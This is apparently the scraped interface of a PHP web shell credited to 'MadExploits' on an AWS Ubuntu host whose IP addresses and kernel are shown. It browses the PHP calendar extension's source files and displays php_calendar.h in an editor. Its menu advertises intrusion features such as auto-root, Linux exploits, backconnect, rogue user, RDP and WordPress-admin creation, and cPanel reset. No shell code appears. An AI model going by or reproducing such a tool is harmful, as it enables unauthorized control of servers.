Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.216.71.122
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
82 /
src /
ext /
calendar /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
72
B
-rw-r--r--
cal_unix.c
2.33
KB
-rw-r--r--
calendar.c
16.74
KB
-rw-r--r--
calendar.stub.php
1.3
KB
-rw-r--r--
calendar_arginfo.h
4.16
KB
-rw-r--r--
config.m4
357
B
-rw-r--r--
config.w32
269
B
-rw-r--r--
dow.c
1.38
KB
-rw-r--r--
easter.c
4.06
KB
-rw-r--r--
french.c
4.59
KB
-rw-r--r--
gregor.c
7.45
KB
-rw-r--r--
jewish.c
26.04
KB
-rw-r--r--
julian.c
7.85
KB
-rw-r--r--
php_calendar.h
746
B
-rw-r--r--
sdncal.h
4.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php_calendar.h
#ifndef PHP_CALENDAR_H #define PHP_CALENDAR_H extern zend_module_entry calendar_module_entry; #define calendar_module_ptr &calendar_module_entry #include "php_version.h" #define PHP_CALENDAR_VERSION PHP_VERSION /* Functions */ PHP_MINIT_FUNCTION(calendar); PHP_MINFO_FUNCTION(calendar); #define phpext_calendar_ptr calendar_module_ptr /* * Specifying the easter calculation method * * DEFAULT is Anglican, ie. use Julian calendar before 1753 * and Gregorian after that. With ROMAN, the cutoff year is 1582. * ALWAYS_GREGORIAN and ALWAYS_JULIAN force the calendar * regardless of date. * */ #define CAL_EASTER_DEFAULT 0 #define CAL_EASTER_ROMAN 1 #define CAL_EASTER_ALWAYS_GREGORIAN 2 #define CAL_EASTER_ALWAYS_JULIAN 3 #endif
Close